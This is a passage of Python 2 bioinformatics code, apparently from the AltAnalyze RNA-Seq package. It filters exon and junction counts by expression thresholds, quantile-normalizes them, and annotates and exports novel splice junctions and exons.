geneID = t[2]; start = int(t[6]); end = int(t[7]); exonID = t[1]
if 'E' in exonID:
try: gene_lengths[geneID]+=abs(end-start)
except Exception: gene_lengths[geneID]=abs(end-start)
return gene_lengths
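### Minimal, self-contained sketch of the gene-length accumulation performed by getGeneExonLengths above,
### using a few hypothetical exon-region records (geneID, exonID, start, stop); intron regions (IDs
### beginning with 'I') lack an 'E' and are therefore excluded, mirroring the check above.
def exampleGeneExonLengths():
    records = [('ENSG0000000001','E1.1',100,250),('ENSG0000000001','E2.1',400,520),('ENSG0000000001','I1.1',250,400)]
    gene_lengths={}
    for (geneID,exonID,start,end) in records:
        if 'E' in exonID:
            try: gene_lengths[geneID]+=abs(end-start)
            except Exception: gene_lengths[geneID]=abs(end-start)
    return gene_lengths ### {'ENSG0000000001': 270}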
def importRawCountData(filename,expressed_gene_exon_db,excludeLowExp=True):
""" Identifies exons or junctions to evaluate gene-level expression. This function, as it is currently written:
1) examines the RPKM and original read counts associated with all exons
2) removes exons/junctions that do not meet their respective RPKM AND read count cutoffs
3) returns ONLY those exons and genes deemed expressed, whether constitutive selected or all exons
"""
### Get expression values for exon/junctions to analyze
seq_ids_to_import={}
for gene in expressed_gene_exon_db:
for exonid in expressed_gene_exon_db[gene]: seq_ids_to_import[exonid]=[]
### Define thresholds
exon_exp_threshold = UserOptions.ExonExpThreshold()
junction_exp_threshold = UserOptions.JunctionExpThreshold()
exon_rpkm_threshold = UserOptions.ExonRPKMThreshold()
gene_rpkm_threshold = UserOptions.RPKMThreshold()
gene_exp_threshold = UserOptions.GeneExpThreshold()
### Import RPKM normalized expression values
fn=filepath(filename); x=0; rpkm_dbase={}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: array_names = t[1:]; x=1
else:
exon_id=t[0]
max_count=max(map(float,t[1:]))
if max_count>=exon_rpkm_threshold or excludeLowExp==False: rpkm_dbase[exon_id]=[] ### Only retain exons/junctions meeting the RPKM threshold
### Import non-normalized original counts
counts_filename = string.replace(filename,'exp.','counts.')
fn=filepath(counts_filename); x=0; exp_dbase={}
all_exp_features={} ### Don't filter for only gene-expression reporting
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: array_names = t[1:]; x=1
else:
exon_id,coordinates = string.split(t[0],'=')
coordinates = string.split(coordinates,':')[1]
coordinates = string.split(coordinates,'-')
length=abs(int(coordinates[1])-int(coordinates[0]))
max_count=max(map(float,t[1:])); proceed = 'no'
if '-' in exon_id:
length = 60.0
if max_count>=junction_exp_threshold or excludeLowExp==False:
### Only considered when exon data is not present in the analysis
proceed = 'yes'
elif max_count>=exon_exp_threshold or excludeLowExp==False: proceed = 'yes'
if proceed == 'yes' and exon_id in rpkm_dbase: ### Ensures that the maximum sample (not group) user defined count threshold is achieved at the exon or junction-level
all_exp_features[exon_id]=None
if exon_id in seq_ids_to_import:### Forces an error if not in the steady-state pre-determined set (CS or all-exons) - INCLUDE HERE TO FILTER ALL FEATURES
exp_dbase[exon_id] = t[1:],length ### Include sequence length for normalization
for exon in exp_dbase: array_count = len(exp_dbase[exon][0]); break
try:null=array_count
except Exception:
print 'No exons or junctions considered expressed (based on user thresholds). Exiting analysis.'; force_exit ### undefined name: deliberately raises a NameError to exit
return exp_dbase, all_exp_features, array_count
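### Minimal sketch of the dual expression filter applied in importRawCountData above: a feature must meet
### the RPKM cutoff (from the exp. file) AND the biotype-specific raw-count cutoff (junction IDs contain a
### dash). The cutoff values below are hypothetical defaults; the real values come from UserOptions.
def exampleFeatureExpressionFilter(max_rpkm, max_count, feature_id, rpkm_cutoff=1.0, exon_count_cutoff=5, junction_count_cutoff=5):
    if max_rpkm < rpkm_cutoff: return False ### fails the normalized-expression filter
    if '-' in feature_id: return max_count >= junction_count_cutoff ### junction feature
    return max_count >= exon_count_cutoff ### exon feature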
def importNormalizedCountData(filename,expressed_gene_exon_db):
### Get expression values for exon/junctions to analyze
seq_ids_to_import={}
for gene in expressed_gene_exon_db:
for exonid in expressed_gene_exon_db[gene]: seq_ids_to_import[exonid]=[]
### Define thresholds
exon_exp_threshold = UserOptions.ExonExpThreshold()
junction_exp_threshold = UserOptions.JunctionExpThreshold()
exon_rpkm_threshold = UserOptions.ExonRPKMThreshold()
gene_rpkm_threshold = UserOptions.RPKMThreshold()
gene_exp_threshold = UserOptions.GeneExpThreshold()
### Import non-normalized original counts
fn=filepath(filename); x=0; exp_dbase={}
all_exp_features={} ### Don't filter for only gene-expression reporting
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: array_names = t[1:]; x=1
else:
exon_id=t[0]; proceed = 'no'
max_count=max(map(float,t[1:]))
if '-' in exon_id:
if max_count>=junction_exp_threshold: proceed = 'yes'
elif max_count>=exon_exp_threshold: proceed = 'yes'
if proceed == 'yes': ### Ensures that the maximum sample (not group) user defined count threshold is achieved at the exon or junction-level
all_exp_features[exon_id]=None
if exon_id in seq_ids_to_import: ### If a "constitutive" or exon-level feature (filter missing prior to 2.0.8 - bug)
exp_dbase[exon_id] = t[1:],0 ### Add the zero just to comply with the raw count input format (indicates exon length)
for exon in exp_dbase: array_count = len(exp_dbase[exon][0]); break
return exp_dbase, all_exp_features, array_count
def obtainGeneCounts(expressed_gene_exon_db,species,exp_dbase,array_count,normalize_feature_exp,excludeLowExp=True):
###Calculate avg expression for each sample for each exon (using constitutive or all exon values)
if excludeLowExp == False:
gene_lengths = getGeneExonLengths(species)
steady_state_db={}
for gene in expressed_gene_exon_db:
x = 0; gene_sum=0
exon_list = expressed_gene_exon_db[gene]
while x < array_count:
exp_list=[]; len_list=[]
for exon in exon_list:
try:
exp_val = exp_dbase[exon][0][x]
if normalize_feature_exp == 'RPKM':
### Decided to include all exons, expressed or not, to prevent long but lowly expressed exons from biasing the expression call
#if float(exp_val) != 0: ### Here, we use the original raw count data, whereas above is the adjusted quantile or raw count data
exp_list.append(exp_val); len_list.append(exp_dbase[exon][1]) ### This is for RNASeq -> don't include undetected exons - made in v.204
else: exp_list.append(exp_val) #elif float(exp_val) != 1:
except KeyError: null =[] ###occurs if the expression exon list is missing some of these exons
try:
if len(exp_list)==0:
for exon in exon_list:
try:
exp_list.append(exp_dbase[exon][0][x]); len_list.append(exp_dbase[exon][1])
#kill
except KeyError: null=[] ### Gene entries will cause this error, since they are in the database but not in the count file
if normalize_feature_exp == 'RPKM':
sum_const_exp=sum(map(float,exp_list)); gene_sum+=sum_const_exp
sum_length=sum(len_list) ### can have different lengths for each sample, since only expressed exons are considered
if excludeLowExp == False:
sum_length = gene_lengths[gene] ### Uses the all annotated exon lengths
### Add only one avg-expression value for each array in this loop
try: steady_state_db[gene].append((sum_const_exp,sum_length))
except KeyError: steady_state_db[gene] = [(sum_const_exp,sum_length)]
else:
avg_const_exp=Average(exp_list)
if avg_const_exp != 1: gene_sum+=avg_const_exp
### Add only one avg-expression value for each array in this loop
try: steady_state_db[gene].append(avg_const_exp)
except KeyError: steady_state_db[gene] = [avg_const_exp]
except Exception: null=[] ### Occurs when processing a truncated dataset (for testing usually) - no values for the gene should be included
x += 1
if gene_sum==0:
try:
del steady_state_db[gene] ### Hence, this gene showed no evidence of expression (most critical for RNA-Seq)
except Exception: null=[] ### Error occurs when a gene is added to the database from self.location_gene_db, but is not expressed
return steady_state_db
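### Minimal sketch of the per-sample steady-state aggregation in obtainGeneCounts above: for RPKM
### normalization the constitutive feature counts and lengths are summed (to be converted to a gene RPKM
### downstream), otherwise the feature values are simply averaged. Inputs below are hypothetical.
def exampleSteadyStateAggregation(feature_values, feature_lengths, normalize_feature_exp='RPKM'):
    if normalize_feature_exp == 'RPKM':
        return sum(feature_values), sum(feature_lengths) ### numerator and denominator for a gene RPKM
    return sum(feature_values)/float(len(feature_values)) ### average of constitutive features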
def returnLargeGlobalVars():
### Prints all large global variables retained in memory (taking up space)
all = [var for var in globals() if (var[:2], var[-2:]) != ("__", "__")]
for var in all:
try:
if len(globals()[var])>1:
print var, len(globals()[var])
except Exception: null=[]
def clearObjectsFromMemory(db_to_clear):
db_keys={}
for key in db_to_clear: db_keys[key]=[]
for key in db_keys:
try: del db_to_clear[key]
except Exception:
try:
for i in key: del i ### For lists of tuples
except Exception: del key ### For plain lists
def verifyFile(filename):
status = 'not found'
try:
fn=filepath(filename)
for line in open(fn,'rU').xreadlines(): status = 'found';break
except Exception: status = 'not found'
return status
def AppendOrWrite(export_path):
export_path = filepath(export_path)
status = verifyFile(export_path)
if status == 'not found':
export_data = export.ExportFile(export_path) ### Write this new file
else:
export_data = open(export_path,'a') ### Appends to existing file
return export_data, status
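### Hedged usage sketch for AppendOrWrite above (the path and header are hypothetical): the returned status
### tells the caller whether a header still needs to be written, the pattern used throughout this module.
#export_data,status = AppendOrWrite('ExpressionInput/counts.MyDataset.txt')
#if status == 'not found': export_data.write('AltAnalyze_ID\tSample1\n')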
def quantileNormalizationSimple(condition_count_db):
### Basic quantile normalization method (average ranked expression values)
### Get all junction or exon entries
key_db={}
for condition in condition_count_db:
count_db = condition_count_db[condition]
for key in count_db: key_db[key]=[]
condition_unnormalized_db={}
for key in key_db:
### Only look at the specific biotype of interest for each normalization
for condition in condition_count_db:
count_db = condition_count_db[condition]
try:
count = float(count_db[key])+1 ###This adjustment allows us to obtain more realistic folds when a zero count is compared, using log2
count_db[key] = [] ### Set equal to null as a temporary measure to save memory
except KeyError: count = 1.00 ###Was zero, but needs to be one for more realistic log2 fold calculations
### store the minimal information to recover the original count and ID data prior to quantile normalization
try: condition_unnormalized_db[condition].append([count,key])
except Exception: condition_unnormalized_db[condition]=[[count,key]]
quantile_normalize_db={}; key_db={}
for condition in condition_unnormalized_db:
condition_unnormalized_db[condition].sort() ### Sort lists by count number
rank=0 ### thus, the ID is the rank order of counts
for (count,key) in condition_unnormalized_db[condition]:
try: quantile_normalize_db[rank].append(count)
except KeyError: quantile_normalize_db[rank] = [count]
rank+=1
### Get the average value for each index
for rank in quantile_normalize_db:
quantile_normalize_db[rank] = Average(quantile_normalize_db[rank])
for condition in condition_unnormalized_db:
rank=0
count_db = condition_count_db[condition]
for (count,key) in condition_unnormalized_db[condition]:
avg_count = quantile_normalize_db[rank]
rank+=1
count_db[key] = str(avg_count) ### re-set this value to the normalized value
try:
clearObjectsFromMemory(condition_unnormalized_db); condition_unnormalized_db = []
clearObjectsFromMemory(quantile_normalize_db); quantile_normalize_db = []
except Exception: None
return condition_count_db
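### Minimal, self-contained sketch of the average-rank quantile normalization implemented above, using a
### hypothetical two-condition structure ({condition: {feature: count-string}}): counts in each condition
### are ranked, values sharing a rank are averaged across conditions, and each original value is replaced
### by its rank average (after the same +1 adjustment used above).
def exampleQuantileNormalization():
    condition_count_db = {'cond1':{'f1':'10','f2':'0','f3':'4'}, 'cond2':{'f1':'7','f2':'2','f3':'9'}}
    ranked={}
    for condition in condition_count_db:
        pairs = [(float(condition_count_db[condition][key])+1,key) for key in condition_count_db[condition]]
        pairs.sort(); ranked[condition] = pairs
    feature_count = min([len(ranked[condition]) for condition in ranked])
    rank_averages=[]
    for rank in range(feature_count):
        rank_averages.append(sum([ranked[condition][rank][0] for condition in ranked])/float(len(ranked)))
    for condition in ranked:
        for rank in range(feature_count):
            count,key = ranked[condition][rank]
            condition_count_db[condition][key] = str(rank_averages[rank])
    return condition_count_db ### e.g., {'cond1': {'f2': '2.0', 'f3': '6.5', 'f1': '10.5'}, ...}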
def combineExonAnnotations(db):
for i in db:
list1=[]; list2=[]
for (junctions,splice_event) in db[i]:
list1.append(junctions); list2.append(splice_event)
junctions = EnsemblImport.combineAnnotations(list1)
splice_event = EnsemblImport.combineAnnotations(list2)
db[i] = junctions,splice_event
return db
def formatID(id):
### JunctionArray methods handle IDs with ":" differently than those that lack it
return string.replace(id,':','@')
def filterChromosomes(chromosome_names):
### If transcriptome only aligned to Ensembl reference, many chromosomes are not real
updated_chromosomes=[]
chr_count=0
for chr in chromosome_names:
if 'chr' in chr and len(chr)<7:
chr_count+=1
updated_chromosomes.append(chr)
if chr_count>1:
return updated_chromosomes
else:
return chromosome_names
def getChromosomeStrandCoordinates(species,testImport):
### For novel junctions with no known splice-site, map to genes
gene_location_db = EnsemblImport.getEnsemblGeneLocations(species,'RNASeq','key_by_array')
chr_strand_gene_db = {}; location_gene_db = {}; chromosome_names={}; all_chromosomes={}
for gene in gene_location_db:
chr,strand,start,end = gene_location_db[gene]
location_gene_db[chr,int(start),int(end)] = gene,strand
try: chr_strand_gene_db[chr,strand].append((int(start),int(end)))
except KeyError: chr_strand_gene_db[chr,strand] = [(int(start),int(end))]
if testImport == 'yes':
if chr=='chr1': chromosome_names[chr]=[]
#if chr=='chr19': chromosome_names[chr]=[] ### Gene rich chromosome
#if chr=='chrMT': chromosome_names[chr]=[] ### Gene rich chromosome
elif len(chr)<7: chromosome_names[chr]=[]
all_chromosomes[chr]=[]
#chromosome_names = filterChromosomes(chromosome_names)
### Some organisms aren't organized into classical chromosomes (why I don't know)
if len(chromosome_names)<10 and len(all_chromosomes)>9 and testImport=='no': chromosome_names = all_chromosomes
return chr_strand_gene_db,location_gene_db,chromosome_names,gene_location_db
def exportDatasetLinkedExons(species,exons_to_export,critical_exon_annotations,root_dir,testImport=None,searchChr=None):
export_path = root_dir+'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_exons.txt'
if searchChr != None:
export_path = string.replace(export_path,'RNASeq/'+species,'RNASeq/exons/'+species)
export_path = string.replace(export_path,'.txt','.'+searchChr+'.txt')
if testImport == 'yes': print 'Writing',export_path
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
export_title = ['AltAnalyzeID','exon_id','ensembl_gene_id','transcript_cluster_id','chromosome','strand','probeset_start','probeset_stop']
export_title +=['class','constitutive_probeset','ens_exon_ids','ens_constitutive_status','exon_region','exon-region-start(s)','exon-region-stop(s)','splice_events','splice_junctions']
export_title = string.join(export_title,'\t')+'\n'; export_data.write(export_title)
### We stored these in a dictionary to make sure each exon is written only once and so we can organize by gene
exons_to_export_list=[]
for key in exons_to_export:
ed = exons_to_export[key]
exons_to_export_list.append((key,ed))
exons_to_export_list.sort()
for (key,ed) in exons_to_export_list:
constitutive_call = 'no'; ens_constitutive_status = '0'
try:
red = ed.ExonRegionData()
exon_region = ed.ExonRegionID()
start = str(ed.ReadStart()); stop = start
if '-' not in exon_region and '_' not in exon_region: annotation = 'known'
else: annotation = 'novel'
except Exception:
red = ed ### For annotated exons, no difference in the annotations
exon_region = ed.ExonRegionIDs()
start = str(red.ExonStart()); stop = str(red.ExonStop())
constitutive_call = red.Constitutive()
if constitutive_call == 'yes': ens_constitutive_status = '1'
annotation = 'known'
uid = red.GeneID()+':'+exon_region
splice_events = red.AssociatedSplicingEvent(); splice_junctions = red.AssociatedSplicingJunctions()
if uid in critical_exon_annotations:
splice_junctions,splice_events = critical_exon_annotations[uid]
export_values = [uid, exon_region, red.GeneID(), '', red.Chr(), red.Strand(), start, stop, annotation, constitutive_call, red.ExonID(), ens_constitutive_status]
export_values+= [exon_region, str(red.ExonStart()), str(red.ExonStop()), splice_events, splice_junctions]
export_values = string.join(export_values,'\t')+'\n'; export_data.write(export_values)
export_data.close()
def exportNovelJunctions(species,novel_junction_db,condition_count_db,root_dir,dataset_name,biotype):
if 'exp.' not in dataset_name: dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name: dataset_name+='.txt'
dataset_name = string.replace(dataset_name,'exp','novel')
dataset_name = string.replace(dataset_name,'.txt','.'+biotype+'.txt')
export_path = root_dir+'ExpressionInput/'+dataset_name
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
title = ['chr','strand','start','stop','start Ensembl','end Ensembl','known start', 'known end']
for condition in condition_count_db: title.append(condition)
export_data.write(string.join(title,'\t')+'\n')
for key in novel_junction_db:
ji = novel_junction_db[key]
try: gene1 = str(ji.GeneID())
except Exception: gene1=''
try: gene2 = str(ji.SecondaryGeneID())
except Exception: gene2 = 'None'
try: le = str(ji.LeftExonAnnotations())
except Exception: le = ''
try: re = str(ji.RightExonAnnotations())
except Exception: re = ''
if biotype == 'junction':
values = [ji.Chr(), ji.Strand(), str(ji.Exon1Stop()), str(ji.Exon2Start())]
elif biotype == 'exon':
values = [ji.Chr(), ji.Strand(), str(ji.Exon1Stop()-1), str(ji.Exon2Start()+1)] ### correct for initial adjustment
values += [gene1,gene2,le,re]
for condition in condition_count_db:
count_db = condition_count_db[condition]
try: read_count = count_db[key]
except KeyError: read_count = '0'
values.append(read_count)
export_data.write(string.join(values,'\t')+'\n')
export_data.close()
def exportDatasetLinkedGenes(species,gene_location_db,root_dir):
"""Include an entry for gene IDs to include constitutive expression for RPKM normalized data"""
export_path = root_dir+'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_junctions.txt'
export_data,status = AppendOrWrite(export_path)
for gene in gene_location_db:
chr,strand,start,end = gene_location_db[gene]
export_values = [gene, 'E0.1',gene, '', chr, strand, str(start), str(end), 'known', 'yes', gene, '1']
export_values+= ['E0.1', str(start), str(end), '', '']
export_values = string.join(export_values,'\t')+'\n'; export_data.write(export_values)
export_data.close()
def exportDatasetLinkedJunctions(species,junction_db,junction_annotations,root_dir,testImport=False,searchChr=None):
export_path = root_dir+'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_junctions.txt'
if searchChr != None:
export_path = string.replace(export_path,'RNASeq/'+species,'RNASeq/junctions/'+species)
export_path = string.replace(export_path,'.txt','.'+searchChr+'.txt')
if testImport == 'yes': print 'Writing',export_path
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
export_title = ['AltAnalyzeID','exon_id','ensembl_gene_id','transcript_cluster_id','chromosome','strand','probeset_start','probeset_stop']
export_title +=['class','constitutive_probeset','ens_exon_ids','ens_constitutive_status','exon_region','exon-region-start(s)','exon-region-stop(s)','splice_events','splice_junctions']
export_title = string.join(export_title,'\t')+'\n'; export_data.write(export_title)
for key in junction_db:
(chr,exon1_stop,exon2_start) = key
ji=junction_db[key]
#print key, ji.UniqueID(), ji.GeneID()
if ji.GeneID()!=None and ji.UniqueID()!=None:
if ji.UniqueID() in junction_annotations: ### Obtained from JunctionArray.inferJunctionComps()
junctions,splice_events = junction_annotations[ji.UniqueID()]
if ji.TransSplicing() == 'yes':
if len(splice_events)>0: splice_events+= '|trans-splicing'
else: splice_events = 'trans-splicing'
ji.setAssociatedSplicingEvent(splice_events); ji.setAssociatedSplicingJunctions(junctions)
elif ji.TransSplicing() == 'yes':
ji.setAssociatedSplicingEvent('trans-splicing')
try:
try: constitutive_call = ji.Constitutive()
except Exception:
jd = ji.ExonAnnotations()
constitutive_call = jd.Constitutive()
if constitutive_call == 'yes': ens_constitutive_status = '1'
else: ens_constitutive_status = '0'
annotation = 'known'
except Exception:
constitutive_call = 'no'; ens_constitutive_status = '0'; annotation = 'novel'
if 'I' in ji.ExonRegionID() or 'U' in ji.ExonRegionID() or '_' in ji.ExonRegionID():
annotation = 'novel' ### Not previously indicated well (as I remember) for exon-level reads - so do this
export_values = [ji.UniqueID(), ji.ExonRegionID(), ji.GeneID(), '', ji.Chr(), ji.Strand(), str(ji.Exon1Stop()), str(ji.Exon2Start()), annotation, constitutive_call, ji.ExonID(), ens_constitutive_status]
export_values+= [ji.ExonRegionID(), str(ji.Exon1Stop()), str(ji.Exon2Start()), ji.AssociatedSplicingEvent(), ji.AssociatedSplicingJunctions()]
export_values = string.join(export_values,'\t')+'\n'; export_data.write(export_values)
export_data.close()
def combineDetectedExons(unmapped_exon_db,align_exon_db,novel_exon_db):
### Used for exon alignments (both start position and end position aligned to exon/intron/UTR regions)
### Reformat align_exon_db to easily lookup exon data
aligned_exon_lookup_db={}
for gene in align_exon_db:
for ed in align_exon_db[gene]:
aligned_exon_lookup_db[gene,ed.ReadStart()]=ed
#if gene == 'ENSMUSG00000064181': print ed.ReadStart(),ed.ExonRegionID()
### Reformat novel_exon_db to easily lookup exon data - created from junction analysis (rename above exons to match novel junctions)
novel_exon_lookup_db={}
for gene in novel_exon_db:
for ed in novel_exon_db[gene]:
try:
### Only store exons that are found in the novel exon file
null = aligned_exon_lookup_db[gene,ed.ReadStart()+1] ### offset introduced on import
novel_exon_lookup_db[gene,ed.ReadStart()+1]=ed
except Exception: null=[]
try:
### Only store exons that are found in the novel exon file
null = aligned_exon_lookup_db[gene,ed.ReadStart()-1] ### offset introduced on import
novel_exon_lookup_db[gene,ed.ReadStart()-1]=ed
except Exception: null=[]
### Look up the proper exon region ID and gene ID to format the unique ID and export coordinates
x = 0
for key in unmapped_exon_db:
(chr,exon1_stop,exon2_start) = key
ji=unmapped_exon_db[key]
proceed = 'no'
if ji.GeneID() != None:
e1 = (ji.GeneID(),exon1_stop)
e2 = (ji.GeneID(),exon2_start)
exon_info=[]; override_annotation = None; found=[]
try: null = aligned_exon_lookup_db[e1]; found.append(1)
except Exception: null=[]
try: null = aligned_exon_lookup_db[e2]; found.append(2)
except Exception: null=[]
try: null = novel_exon_lookup_db[e1]; override_annotation = 1
except Exception:
try: null = novel_exon_lookup_db[e2]; override_annotation = 2
except Exception: null=[]
if len(found)>0:
### Below is not the simplest way to do this, but should be the fastest
if 1 in found: exon_info.append(aligned_exon_lookup_db[e1])
if 2 in found: exon_info.append(aligned_exon_lookup_db[e2])
if len(exon_info) == 2: ed1,ed2 = exon_info
else:
ed1 = exon_info[0]; ed2 = ed1; x+=1 ### if only one splice site aligned to a gene region (shouldn't occur)
if x == 2: null=[]; #print 'SOME EXONS FOUND WITH ONLY ONE ALIGNING POSITION...',key,ji.GeneID(),ed1.ExonRegionID(),e1,e2
try: red1 = ed1.ExonRegionData(); red2 = ed2.ExonRegionData()
except Exception:
"""
print [ji.GeneID(), ji.Chr(), key]
print e1, e2
try: print ed1.ExonRegionData()
except Exception: 'ed1 failed'
try: print ed2.ExonRegionData()
except Exception: 'ed2 failed'
"""
continue
region1 = ed1.ExonRegionID(); region2 = ed2.ExonRegionID()
#print region1,region2,ji.GeneID(),ji.Chr(),ji.Strand()
try: splice_junctions = EnsemblImport.combineAnnotations([red1.AssociatedSplicingJunctions(),red2.AssociatedSplicingJunctions()])
except Exception: print red1, red2;sys.exit()
splice_events = EnsemblImport.combineAnnotations([red1.AssociatedSplicingEvent(),red2.AssociatedSplicingEvent()])
ji.setAssociatedSplicingJunctions(splice_junctions)
ji.setAssociatedSplicingEvent(splice_events)
ens_exon_ids = EnsemblImport.combineAnnotations([red1.ExonID(),red2.ExonID()])
ji.setExonID(ens_exon_ids)
if red1.Constitutive() == 'yes' or red2.Constitutive() == 'yes': constitutive_call = 'yes'
else: constitutive_call = 'no'
ji.setConstitutive(constitutive_call)
report_both_regions = 'no'
try:
### If the annotations are from a BED file produced by AltAnalyze, novel alternative splice sites may be present
### if the below variable is not created, then this exon may over-ride the annotated exon region (e.g., E15.1 is over-written by E15.1_1234;E15.1_1256)
if 'ENS' in ji.JunctionID() and ':' not in ji.JunctionID(): report_both_regions = 'yes'
except Exception: null=[]
try:
### If the annotations are from a BED file produced by AltAnalyze, it is possible for a known exon to share a splice-site coordinate
### with a novel junction exon. This will cause both to have the same override_annotation. Prevent this with the below 2nd override
if 'ENS' in ji.JunctionID() and ':' in ji.JunctionID(): override_annotation = None
except Exception: null=[]
if override_annotation != None:
if '_' in region1: region1 = string.split(region1,'_')[0]+'_'+str(int(string.split(region1,'_')[-1])-1)
if '_' in region2: region2 = string.split(region2,'_')[0]+'_'+str(int(string.split(region2,'_')[-1])+1)
if override_annotation == 1: region_id = region1 ### This forces a TopHat exon to be named for the splice-site position
else: region_id = region2
else:
if report_both_regions == 'no':
### Don't include specific start and end coordinates if inside a known exon
if ed1.AlignmentRegion() == 'exon': region1 = string.split(region1,'_')[0]
if ed2.AlignmentRegion() == 'exon': region2 = string.split(region2,'_')[0]
if ed1.AlignmentRegion() == 'full-intron' and ed2.AlignmentRegion() == 'full-intron':
region1 = string.split(region1,'_')[0]; region2 = string.split(region2,'_')[0]
### The adjustments below need to compensate for adjustments made upon import
if '_' in region1: region1 = string.split(region1,'_')[0]+'_'+str(int(string.split(region1,'_')[-1])-1)
if '_' in region2: region2 = string.split(region2,'_')[0]+'_'+str(int(string.split(region2,'_')[-1])+1)
ji.setExon1Stop(ji.Exon1Stop()-1); ji.setExon2Start(ji.Exon2Start()+1)
if override_annotation != None: null=[] ### It is already assigned above
elif region1 == region2: region_id = region1
elif ji.Strand() == '+': region_id = region1+';'+region2
else: region_id = region2+';'+region1 ### start and stop are genomically assigned
uid = ji.GeneID()+':'+region_id
#try: exon_region_db[ji.GeneID()].append((formatID(uid),region_id))
#except KeyError: exon_region_db[ji.GeneID()]=[(formatID(uid),region_id)]
ji.setExonRegionID(region_id)
ji.setUniqueID(uid) ### hgu133
### Export format for new exons to add to the existing critical exon database (those in exon_region_db are combined with analyzed junctions)
#exons_to_export[ji.GeneID(),region_id] = ji
else:
#print key, ji.GeneID(), ji.JunctionID(); sys.exit()
null=[] ### Occurs because two genes are overlapping
#return exons_to_export
def annotateNovelJunctions(novel_junction_db,novel_exon_db,exons_to_export):
### Reformat novel_exon_db to easily lookup exon data
novel_exon_lookup_db={}
for gene in novel_exon_db:
for ed in novel_exon_db[gene]:
novel_exon_lookup_db[gene,ed.ReadStart()]=ed
### Look up the proper exon region ID and gene ID to format the unique ID and export coordinates
junction_region_db={}
unknown_gene_junctions={}
for key in novel_junction_db:
(chr,exon1_stop,exon2_start) = key
ji=novel_junction_db[key]
proceed = 'no'
if ji.GeneID() != None:
if ji.SpliceSitesFound() != 'both':
e1 = (ji.GeneID(),exon1_stop)
if ji.TransSplicing() == 'yes':
e2 = (ji.SecondaryGeneID(),exon2_start)
else: e2 = (ji.GeneID(),exon2_start)
if e1 in novel_exon_lookup_db and e2 in novel_exon_lookup_db:
proceed = 'yes'
try: ed1 = novel_exon_lookup_db[e1]; red1 = ed1.ExonRegionData(); gene1 = e1[0]
except Exception:
print chr, key, e1; kill ### undefined name: deliberately raises a NameError to halt
ed2 = novel_exon_lookup_db[e2]; red2 = ed2.ExonRegionData(); gene2 = e2[0]
### If the splice-site was a match to a known junction splice site, use it instead of the one identified by exon-region location overlap
if ji.LeftExonAnnotations() != None: region1 = ji.LeftExonAnnotations()
else: region1 = ed1.ExonRegionID(); exons_to_export[gene1,region1] = ed1
if ji.RightExonAnnotations() != None: region2 = ji.RightExonAnnotations()
else: region2 = ed2.ExonRegionID(); exons_to_export[gene2,region2] = ed2
#print region1,region2,ji.GeneID(),ji.Chr(),ji.Strand(), ji.LeftExonAnnotations(), ji.RightExonAnnotations()
else:
proceed = 'yes'
region1 = ji.LeftExonAnnotations()
region2 = ji.RightExonAnnotations()
red1 = ji.LeftExonRegionData()
red2 = ji.RightExonRegionData()
### Store the individual exons for export
gene1 = ji.GeneID()
if ji.TransSplicing() == 'yes': gene2 = ji.SecondaryGeneID()
else: gene2 = ji.GeneID()
exons_to_export[gene1,region1] = red1
exons_to_export[gene2,region2] = red2
if proceed == 'yes':
try: splice_junctions = EnsemblImport.combineAnnotations([red1.AssociatedSplicingJunctions(),red2.AssociatedSplicingJunctions()])
except Exception: print red1, red2;sys.exit()
splice_events = EnsemblImport.combineAnnotations([red1.AssociatedSplicingEvent(),red2.AssociatedSplicingEvent()])
ji.setAssociatedSplicingJunctions(splice_junctions)
ji.setAssociatedSplicingEvent(splice_events)
ens_exon_ids = EnsemblImport.combineAnnotations([red1.ExonID(),red2.ExonID()])
ji.setExonID(ens_exon_ids)
if ji.TransSplicing() == 'yes':
uid = ji.GeneID()+':'+region1+'-'+ji.SecondaryGeneID()+':'+region2
region_id = uid
### When trans-splicing occurs, add the data twice to junction_region_db for the two different genes
### in JunctionArray.inferJunctionComps, establish two separate gene junctions with a unique ID for the non-gene exon
try: junction_region_db[ji.GeneID()].append((formatID(uid),region1+'-'+'U1000.1_'+str(ji.Exon2Start())))
except KeyError: junction_region_db[ji.GeneID()]=[(formatID(uid),region1+'-'+'U1000.1_'+str(ji.Exon2Start()))]
try: junction_region_db[ji.SecondaryGeneID()].append((formatID(uid),'U0.1_'+str(ji.Exon1Stop())+'-'+region2))
except KeyError: junction_region_db[ji.SecondaryGeneID()]=[(formatID(uid),'U0.1_'+str(ji.Exon1Stop())+'-'+region2)]
else:
uid = ji.GeneID()+':'+region1+'-'+region2
region_id = region1+'-'+region2
try: junction_region_db[ji.GeneID()].append((formatID(uid),region_id))
except KeyError: junction_region_db[ji.GeneID()]=[(formatID(uid),region_id)]
ji.setExonRegionID(region_id)
ji.setUniqueID(uid)
else:
unknown_gene_junctions[key]=[]
return junction_region_db,exons_to_export
def alignReadsToExons(novel_exon_db,ens_exon_db,testImport=False):
### Simple method for aligning a single coordinate to an exon/intron region of an already matched gene
examined_exons=0; aligned_exons=0
for gene in ens_exon_db: #novel_exon_db
try:
region_numbers=[]; region_starts=[]; region_stops=[]
for ed in novel_exon_db[gene]:
examined_exons+=1; aligned_status=0; index=-1
for rd in ens_exon_db[gene]:
index+=1 ### keep track of exon/intron we are in
region_numbers.append(int(string.split(rd.ExonRegionIDs()[1:],'.')[0]))
if rd.Strand() == '-': region_starts.append(rd.ExonStop()); region_stops.append(rd.ExonStart())
else: region_starts.append(rd.ExonStart()); region_stops.append(rd.ExonStop())
#print [rd.ExonStart(),rd.ExonStop(), rd.Strand()]
#print [ed.ReadStart(),rd.ExonStart(),rd.ExonStop()]
if ed.ReadStart()>=rd.ExonStart() and ed.ReadStart()<=rd.ExonStop():
ed.setAlignmentRegion('exon')
if 'I' in rd.ExonRegionIDs(): ### In an annotated intron
ed.setAlignmentRegion('intron')
ord = rd; updated = None
try: ### If the splice site is a novel 3' splice site then annotate as the 3' exon (less than 50nt away)
nrd = ens_exon_db[gene][index+1]
